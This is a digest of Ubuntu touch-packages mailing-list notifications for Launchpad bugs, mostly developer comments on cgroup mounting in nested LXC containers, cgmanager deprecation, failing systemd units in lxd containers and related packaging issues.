Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

This bug incidentally also affects the cgroupfs-mount package.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

(Note - this means the patch I just pushed to zesty is in fact wrong.
Since zesty requires systemd this doesn't really matter, but we must get
a working patch before pushing SRU patches)

@ccope, please let me know if you care to write an update patch.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

Hm, yes i see (hierarchy 0).  I do worry that means that systems with
the unified hierarchy will be still more of a problem, since it is
mounted as hierarchy 0.  But then it's probably fine to just say that
cgroup-lite doesn't support unified hierarchy.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

** Also affects: cgroup-lite (Ubuntu Trusty)
   Importance: Undecided
   Status: New

** Also affects: cgroup-lite (Ubuntu Precise)
   Importance: Undecided
   Status: New

** Also affects: cgroup-lite (Ubuntu Yakkety)
   Importance: Undecided
   Status: New

** Also affects: cgroup-lite (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: cgroup-lite (Ubuntu Precise)
   Importance: Undecided => High

** Changed in: cgroup-lite (Ubuntu Trusty)
   Importance: Undecided => High

** Changed in: cgroup-lite (Ubuntu Xenial)
   Importance: Undecided => High

** Changed in: cgroup-lite (Ubuntu Yakkety)
   Importance: Undecided => High

** Description changed:

  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the cgroups
  inside the containers has stopped working. This is because systemd now
  comounts multiple controllers on a single hierarchy, which prevents
  mounting them individually inside the container.
+ 
+ ===  SRU Justification 
+ Impact: nested containers fail to start
+ Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
+ Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
+ ===

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged
Status in cgroup-lite source package in Precise:
  New
Status in cgroup-lite source package in Trusty:
  New
Status in cgroup-lite source package in Xenial:
  New
Status in cgroup-lite source package in Yakkety:
  New

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

I assume /sys/fs/cgroup/systemd was used because that's where systemd
expected to see it.  I can't find any version which mounts it at
/sys/fs/cgroup/name=systemd - do you have a version that does that?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

Thanks for the patches.  Note that you've changed the loop variable from
d to c, but the loop is still using d, so nothing gets mounted with that
patch verbatim.  Switching the variable back to d fixes the issue for
me.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

** Changed in: cgroup-lite (Ubuntu)
   Importance: Undecided => High

** Changed in: cgroup-lite (Ubuntu)
   Status: New => Triaged

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Triaged

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1576341] Re: fails in lxd container

[Serge Hallyn]

Seems like just adding

ConditionVirtualization=!container

to debian//open-iscsi.service should fix it.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lvm2 in Ubuntu.
https://bugs.launchpad.net/bugs/1576341

Title:
  fails in lxd container

Status in lvm2 package in Ubuntu:
  Confirmed
Status in lxd package in Ubuntu:
  Invalid
Status in open-iscsi package in Ubuntu:
  Confirmed
Status in systemd package in Ubuntu:
  Confirmed

Bug description:
  The ubuntu:xenial image shows 'degraded' state in lxd on initial boot.

  $ lxc launch xenial x1
  $ sleep 10
  $ lxc file pull x1/etc/cloud/build.info -
  build_name: server
  serial: 20160420-145324

  $ lxc exc x1 systemctl is-system-running
  degraded

  $ lxc exec x1 systemctl --state=failed
    UNIT  LOAD   ACTIVE SUBDESCRIPTION
  ● dev-hugepages.mount   loaded failed failed Huge Pages File System
  ● iscsid.serviceloaded failed failed iSCSI initiator daemon 
(iscsid)
  ● open-iscsi.serviceloaded failed failed Login to default iSCSI 
targets
  ● systemd-remount-fs.serviceloaded failed failed Remount Root and Kernel 
File Systems
  ● systemd-sysctl.serviceloaded failed failed Apply Kernel Variables
  ● lvm2-lvmetad.socket   loaded failed failed LVM2 metadata daemon 
socket
  ● systemd-journald-audit.socket loaded failed failed Journal Audit Socket

  LOAD   = Reflects whether the unit definition was properly loaded.
  ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
  SUB= The low-level unit activation state, values depend on unit type.

  7 loaded units listed. Pass --all to see loaded but inactive units, too.
  To show all installed unit files use 'systemctl list-unit-files'.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  Date: Thu Apr 28 17:28:04 2016
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
  SourcePackage: open-iscsi
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1576341/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1639440] Re: [desktop] apps don't start, missing logs

[Serge Hallyn]

This is related to the other open bugs caused by systemd starting to
mount the unified hierarchy.  There had been a branch of cgmanager able
to handle unified, around June 2015, but it was only experimental.

Does unity still require cgmanager?  Note that cgmanager's deprecation
(https://linuxcontainers.org/) was announced some time ago.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1639440

Title:
  [desktop] apps don't start, missing logs

Status in Canonical System Image:
  Incomplete
Status in cgmanager package in Ubuntu:
  New
Status in ubuntu-app-launch package in Ubuntu:
  New
Status in unity8 package in Ubuntu:
  Incomplete

Bug description:
  Ubuntu 17.04 + proposed (unity8 desktop session)
  unity8/zesty-proposed,now 8.14+17.04.20161027-0ubuntu1 amd64 
[installed,automatic]

  apps don't load and i can't find the logs in ~/.cache/upstart for the
  apps. i'll upload the logs that i do have for unity8

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1639440/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1633264] Re: My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel

[Serge Kopalkin]

Nevermind.

** Changed in: network-manager (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1633264

Title:
  My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel

Status in network-manager package in Ubuntu:
  Invalid

Bug description:
  Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi 
stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the 
computer with -42 kernel everything is ok, with -43 kernel wifi stopped 
working, only lo interface available in ifconfig, lshw -C network says network 
unclaimed.
  I'm not sure where to look for meaningful logs related to the issue.
  Help pls!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1633264/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1633264] [NEW] My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel

[Serge Kopalkin]

Public bug reported:

Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi 
stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the 
computer with -42 kernel everything is ok, with -43 kernel wifi stopped 
working, only lo interface available in ifconfig, lshw -C network says network 
unclaimed.
I'm not sure where to look for meaningful logs related to the issue.
Help pls!

** Affects: network-manager (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1633264

Title:
  My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel

Status in network-manager package in Ubuntu:
  New

Bug description:
  Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi 
stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the 
computer with -42 kernel everything is ok, with -43 kernel wifi stopped 
working, only lo interface available in ifconfig, lshw -C network says network 
unclaimed.
  I'm not sure where to look for meaningful logs related to the issue.
  Help pls!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1633264/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1611243] Re: lxc-attach "lxc-attach: attach.c: lxc_attach: 730 failed to get the init pid"

[Serge Hallyn]

You do not show a 'lxc-start' command.  You do need to manually start
the container before you can attach to it.

** Changed in: lxc (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1611243

Title:
  lxc-attach "lxc-attach: attach.c: lxc_attach: 730 failed to get the
  init pid"

Status in lxc package in Ubuntu:
  Invalid

Bug description:
  This is what I did:

  1. sudo lxc-create -t download -n itsnotfine -- --dist ubuntu --release 
xenial --arch amd64
  2. sudo lxc-attach -n itsnotfine

 lxc-attach: attach.c: lxc_attach: 730 failed to get the init pid

  3. Returns to command line prompt.

  I expected to be attached to the newly created container.

  dist version: Ubuntu 16.04.1 LTS
  package version: 2.0.3-0ubuntu1~ubuntu16.04.1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1611243/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1574566] Re: package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

[Serge Hallyn]

Indeed, that (-d) is a difference in how the upstart and systemctl
jobs expect to function.  The upstart job was 'expect daemon' and
specifies -d in the upstart job itself (not in
/etc/default/libvirt-bin)

Assuming Ubuntu doesn't drop the upstart job altogether (which would
be a problem for me) it might be good, during yakkety, to switch the
upstart job to also not daemonizing libvirt.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1574566

Title:
  package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in libvirt package in Ubuntu:
  Invalid
Status in systemd package in Ubuntu:
  Invalid

Bug description:
  upgrade 15.10 -> 16.04

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: libvirt-bin 1.3.1-1ubuntu10
  ProcVersionSignature: Ubuntu 4.2.0-36.41-generic 4.2.8-ckt8
  Uname: Linux 4.2.0-36-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  Date: Mon Apr 25 12:44:51 2016
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-04-06 (19 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
  ProcCmdline: BOOT_IMAGE=/vmlinuz-4.2.0-36-generic 
root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
  SourcePackage: libvirt
  Title: package libvirt-bin 1.3.1-1ubuntu10 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: Upgraded to xenial on 2016-04-25 (0 days ago)
  modified.conffile..etc.libvirt.qemu.networks.default.xml: [modified]
  mtime.conffile..etc.libvirt.qemu.networks.default.xml: 
2016-04-14T14:20:45.067249

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1574566/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash

[Serge Hallyn]

I'm sorry, I'm as context-swapped as you are...  can you remind me why
it is needed, versus simply having libpam-cgfs setup to give you cgroups
upon login?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1535058

Title:
  applications close instantly when launched from the launcher or dash

Status in Canonical System Image:
  Confirmed
Status in cgmanager package in Ubuntu:
  Incomplete
Status in qtmir package in Ubuntu:
  Invalid
Status in ubuntu-app-launch package in Ubuntu:
  Fix Released
Status in unity8 package in Ubuntu:
  Invalid
Status in unity8-desktop-session package in Ubuntu:
  Invalid
Status in upstart package in Ubuntu:
  Invalid

Bug description:
  xenial
  applications close instantly when launched from the launcher or dash
  but... if i launch the apps from a VT (for ex firefox using Xmir or gedit 
native --), the app loads ok.

  what close instantly means.. it opens the window and then it closes
  instantly in ~0.3s

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash

[Serge Hallyn]

Quoting David Planella (david.plane...@ubuntu.com):
> In my case it's disabled, but even after enabling it manually, I'm
> getting the same errors that I had a few months back:
> 
> "cgmanager:do_create_main: pid 2118 (uid 1000 gid 1000) may not create
> under /run/cgmanager/fs/freezer"

This suggests that libpam-cgm is not installed or configured.  Indeed,
cgmanager should not allow you to create a cgroup in that directory,
as that is the root freezer cgroup.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1535058

Title:
  applications close instantly when launched from the launcher or dash

Status in Canonical System Image:
  Confirmed
Status in cgmanager package in Ubuntu:
  Incomplete
Status in qtmir package in Ubuntu:
  Invalid
Status in ubuntu-app-launch package in Ubuntu:
  Fix Released
Status in unity8 package in Ubuntu:
  Invalid
Status in unity8-desktop-session package in Ubuntu:
  Invalid
Status in upstart package in Ubuntu:
  Invalid

Bug description:
  xenial
  applications close instantly when launched from the launcher or dash
  but... if i launch the apps from a VT (for ex firefox using Xmir or gedit 
native --), the app loads ok.

  what close instantly means.. it opens the window and then it closes
  instantly in ~0.3s

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1535058] Re: applications close instantly when launched from the launcher or dash

[Serge Hallyn]

Why is it being *dis*abled?  it's not needed, but it's also not in the
way.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1535058

Title:
  applications close instantly when launched from the launcher or dash

Status in Canonical System Image:
  Confirmed
Status in cgmanager package in Ubuntu:
  Incomplete
Status in qtmir package in Ubuntu:
  Invalid
Status in ubuntu-app-launch package in Ubuntu:
  Fix Released
Status in unity8 package in Ubuntu:
  Invalid
Status in unity8-desktop-session package in Ubuntu:
  Invalid
Status in upstart package in Ubuntu:
  Invalid

Bug description:
  xenial
  applications close instantly when launched from the launcher or dash
  but... if i launch the apps from a VT (for ex firefox using Xmir or gedit 
native --), the app loads ok.

  what close instantly means.. it opens the window and then it closes
  instantly in ~0.3s

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1535058/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1598108] Re: ubuntu/xenial64 slow sstart

[Serge Hallyn]

I'm confused as to why you reported this bug against lxc in ubuntu.
Were you running vagrant+virtualbox inside an ubuntu lxc container?


** Package changed: lxc (Ubuntu) => cloud-images

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1598108

Title:
  ubuntu/xenial64 slow sstart

Status in cloud-images:
  New

Bug description:
  host system:
  mint 18, virtualbox 5.0.24-108355~Ubuntu~xenial, Vagrant 1.8.1

  Steps to reproduce
  % vagrant init ubuntu/xenial64; vagrant up --provider virtualbox

  Expected behavior:
  system starts 5-7 seconds

  Current behavior:
  system starts about 90 seconds.

  most of the time system booting kernel. in the main directory appears
  a log file with boot log

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-images/+bug/1598108/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1392176] Re: mounts cgroups unconditionally which causes undesired effects with cpu hotplug

[Serge Hallyn]

I recommend opening new bugs against libvirt and docker.  Libvirt moves
VMS into a cpuset by default.  I assume docker does the same.  (My
xenial laptop runs upstart, so this is not systemd's doing)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1392176

Title:
  mounts cgroups unconditionally which causes undesired effects with cpu
  hotplug

Status in cgmanager package in Ubuntu:
  Fix Released
Status in linux package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Fix Released

Bug description:
  == Comment: #0 - Preeti U. Murthy  - 2014-10-20 
04:40:12 ==
  ---Problem Description---
  Systemd mounts cgroups explicitly every boot. Since the user had no say in 
it, undesired consequences are observed in reaction to cpu hotplug operations.  
Here is how.

  Systemd moves the tasks to the cgroup mounted by it. This cgroup 
automatically becomes the child of the root cgroup which is present by default. 
The children cgroups are not expected to remember their configured cpusets 
after hotplug operations in the kernel. Hence when cpus are taken offline and 
brought back online they are no longer used for load balancing of tasks and 
hence remain unused. 
 This is an undesired consequence because the user had not even asked for 
cgroups to be mounted, yet is not able to use the full capacity of the system.

  Only when the user himself creates cgroup hierarchies, should he be
  exposed to the side effects of cpu hotplug on cpusets. Else all online
  cpus must be made available to him which is not happening since
  systemd mounts cgroups on every boot.

  Hence please revert this feature or provide an explaination as to why this is 
being done.
   
  ---uname output---
  Linux tul181p1 3.16.0-18-generic #25-Ubuntu SMP Fri Sep 26 02:39:53 UTC 2014 
ppc64le ppc64le ppc64le GNU/Linux
   
  Machine Type = Tuleta 8286-42A 
   ---Debugger---
  A debugger was configured, however the system did not enter into the debugger
   
  ---Steps to Reproduce---
   $ taskset -p $$
  $ 0-127
  $ echo 0 > /sys/devices/system/cpu/cpu7/online
  $ taskset -p $$
  $ 0-6,8-127
  $ echo 1 > /sys/devices/system/cpu/cpu7/online
  $ taskset -p $$
  $ 0-6,8-127
   
   
  Userspace tool common name: systemd 
   
  The userspace tool has the following bit modes: 64-bit 

  Userspace rpm: systemd_208-8ubuntu8_ppc64el.deb

  Userspace tool obtained from project website:   208-8ubuntu8

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1392176/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1392176] Re: mounts cgroups unconditionally which causes undesired effects with cpu hotplug

[Serge Hallyn]

"LXC cases, like docker and KVM" - did you mean non-lxc cases?

xenial by default should now be using libpam-cgfs, should not be using
cgmanager, and should not be creating cpusets.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1392176

Title:
  mounts cgroups unconditionally which causes undesired effects with cpu
  hotplug

Status in cgmanager package in Ubuntu:
  Fix Released
Status in linux package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Fix Released

Bug description:
  == Comment: #0 - Preeti U. Murthy  - 2014-10-20 
04:40:12 ==
  ---Problem Description---
  Systemd mounts cgroups explicitly every boot. Since the user had no say in 
it, undesired consequences are observed in reaction to cpu hotplug operations.  
Here is how.

  Systemd moves the tasks to the cgroup mounted by it. This cgroup 
automatically becomes the child of the root cgroup which is present by default. 
The children cgroups are not expected to remember their configured cpusets 
after hotplug operations in the kernel. Hence when cpus are taken offline and 
brought back online they are no longer used for load balancing of tasks and 
hence remain unused. 
 This is an undesired consequence because the user had not even asked for 
cgroups to be mounted, yet is not able to use the full capacity of the system.

  Only when the user himself creates cgroup hierarchies, should he be
  exposed to the side effects of cpu hotplug on cpusets. Else all online
  cpus must be made available to him which is not happening since
  systemd mounts cgroups on every boot.

